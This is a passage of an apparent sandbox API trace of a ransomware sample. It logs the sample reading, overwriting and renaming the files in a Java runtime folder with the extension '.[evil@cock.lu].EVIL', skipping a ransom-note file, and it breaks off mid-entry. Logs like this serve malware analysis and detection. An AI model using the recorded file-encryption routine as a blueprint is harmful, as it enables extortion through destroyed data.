[0091.785] wcsstr (_Str="javaw.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.785] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe") returned 49 [0091.786] wcscmp (_String1="javaw.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.786] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javaw.exe") returned 0x0 [0091.786] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe") returned 0x31 [0091.786] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.787] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x32840, lpOverlapped=0x0) returned 1 [0091.840] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.840] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.840] _errno () returned 0x84b1160840 [0091.841] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.841] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x32860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x32860, lpOverlapped=0x0) returned 1 [0091.841] CloseHandle (hObject=0x1a4) returned 1 [0091.841] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.842] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.842] __uncaught_exception () returned 0x84b1160800 [0091.842] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.842] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaw.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaw.exe.[evil@cock.lu].evil")) returned 1 [0091.842] ??_V@YAXPEAX@Z () returned 0x1 [0091.845] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe", dwFileAttributes=0x0) returned 0 [0091.845] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.845] wcsstr (_Str="javaws.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.845] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe") returned 50 [0091.845] wcscmp (_String1="javaws.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.845] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javaws.exe") returned 0x0 [0091.845] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe") returned 0x32 [0091.845] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.847] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4dc40, lpOverlapped=0x0) returned 1 [0091.869] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.869] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.869] _errno () returned 0x84b1160840 [0091.870] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.870] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4dc60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4dc60, lpOverlapped=0x0) returned 1 [0091.871] CloseHandle (hObject=0x1a4) returned 1 [0091.871] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.871] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.871] __uncaught_exception () returned 0x84b1160800 [0091.871] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.871] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaws.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaws.exe.[evil@cock.lu].evil")) returned 1 [0091.872] ??_V@YAXPEAX@Z () returned 0x1 [0091.874] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe", dwFileAttributes=0x0) returned 0 [0091.875] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.875] wcsstr (_Str="java_crw_demo.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.875] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll") returned 57 [0091.875] wcscmp (_String1="java_crw_demo.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.875] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java_crw_demo.dll") returned 0x0 [0091.875] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll") returned 0x39 [0091.875] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java_crw_demo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.876] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x7440, lpOverlapped=0x0) returned 1 [0091.879] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.879] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.879] _errno () returned 0x84b1160840 [0091.879] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.879] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x7460, lpOverlapped=0x0) returned 1 [0091.879] CloseHandle (hObject=0x1a4) returned 1 [0091.880] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.880] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.880] __uncaught_exception () returned 0x84b1160800 [0091.880] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.880] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java_crw_demo.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java_crw_demo.dll.[evil@cock.lu].evil")) returned 1 [0091.881] ??_V@YAXPEAX@Z () returned 0x1 [0091.883] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java_crw_demo.dll", dwFileAttributes=0x0) returned 0 [0091.883] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.883] wcsstr (_Str="jawt.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.883] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll") returned 48 [0091.883] wcscmp (_String1="jawt.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.884] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jawt.dll") returned 0x0 [0091.884] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll") returned 0x30 [0091.884] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.886] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3840, lpOverlapped=0x0) returned 1 [0091.888] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.888] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.888] _errno () returned 0x84b1160840 [0091.888] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.888] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3860, lpOverlapped=0x0) returned 1 [0091.888] CloseHandle (hObject=0x1a4) returned 1 [0091.888] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.889] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.889] __uncaught_exception () returned 0x84b1160800 [0091.889] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.889] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawt.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawt.dll.[evil@cock.lu].evil")) returned 1 [0091.889] ??_V@YAXPEAX@Z () returned 0x1 [0091.892] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jawt.dll", dwFileAttributes=0x0) returned 0 [0091.892] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.904] wcsstr (_Str="JAWTAccessBridge-64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.904] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll") returned 63 [0091.904] wcscmp (_String1="JAWTAccessBridge-64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.904] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="JAWTAccessBridge-64.dll") returned 0x0 [0091.904] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll") returned 0x3f [0091.904] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.906] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3c40, lpOverlapped=0x0) returned 1 [0091.908] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.908] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.908] _errno () returned 0x84b1160840 [0091.908] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3c60, lpOverlapped=0x0) returned 1 [0091.908] CloseHandle (hObject=0x1a4) returned 1 [0091.908] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.909] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.909] __uncaught_exception () returned 0x84b1160800 [0091.909] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.909] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawtaccessbridge-64.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jawtaccessbridge-64.dll.[evil@cock.lu].evil")) returned 1 [0091.910] ??_V@YAXPEAX@Z () returned 0x1 [0091.912] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JAWTAccessBridge-64.dll", dwFileAttributes=0x0) returned 0 [0091.913] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.913] wcsstr (_Str="jdwp.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.913] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll") returned 48 [0091.913] wcscmp (_String1="jdwp.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.913] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jdwp.dll") returned 0x0 [0091.913] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll") returned 0x30 [0091.913] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jdwp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.914] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x31440, lpOverlapped=0x0) returned 1 [0091.918] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.918] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.918] _errno () returned 0x84b1160840 [0091.918] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x31460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x31460, lpOverlapped=0x0) returned 1 [0091.919] CloseHandle (hObject=0x1a4) returned 1 [0091.919] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.919] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.919] __uncaught_exception () returned 0x84b1160800 [0091.919] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.920] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jdwp.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jdwp.dll.[evil@cock.lu].evil")) returned 1 [0091.920] ??_V@YAXPEAX@Z () returned 0x1 [0091.924] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jdwp.dll", dwFileAttributes=0x0) returned 0 [0091.924] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.924] wcsstr (_Str="jfr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.924] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll") returned 47 [0091.925] wcscmp (_String1="jfr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.925] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfr.dll") returned 0x0 [0091.925] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll") returned 0x2f [0091.925] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.927] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x6840, lpOverlapped=0x0) returned 1 [0091.931] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.931] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.931] _errno () returned 0x84b1160840 [0091.931] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.931] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x6860, lpOverlapped=0x0) returned 1 [0091.931] CloseHandle (hObject=0x1a4) returned 1 [0091.931] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.931] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.931] __uncaught_exception () returned 0x84b1160800 [0091.932] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.932] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfr.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfr.dll.[evil@cock.lu].evil")) returned 1 [0091.932] ??_V@YAXPEAX@Z () returned 0x1 [0091.936] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfr.dll", dwFileAttributes=0x0) returned 0 [0091.936] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.936] wcsstr (_Str="jfxmedia.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.936] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll") returned 52 [0091.936] wcscmp (_String1="jfxmedia.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.936] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfxmedia.dll") returned 0x0 [0091.936] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll") returned 0x34 [0091.937] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxmedia.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.940] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x22240, lpOverlapped=0x0) returned 1 [0091.957] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.957] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.957] _errno () returned 0x84b1160840 [0091.957] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.957] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x22260, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x22260, lpOverlapped=0x0) returned 1 [0091.958] CloseHandle (hObject=0x1a4) returned 1 [0091.958] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.958] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.959] __uncaught_exception () returned 0x84b1160800 [0091.959] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxmedia.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxmedia.dll.[evil@cock.lu].evil")) returned 1 [0091.960] ??_V@YAXPEAX@Z () returned 0x1 [0091.963] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxmedia.dll", dwFileAttributes=0x0) returned 0 [0091.964] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.964] wcsstr (_Str="jfxwebkit.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.964] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll") returned 53 [0091.964] wcscmp (_String1="jfxwebkit.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.964] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfxwebkit.dll") returned 0x0 [0091.964] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll") returned 0x35 [0091.964] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jfxwebkit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.966] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0092.056] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.056] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.056] _errno () returned 0x84b1160840 [0092.058] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 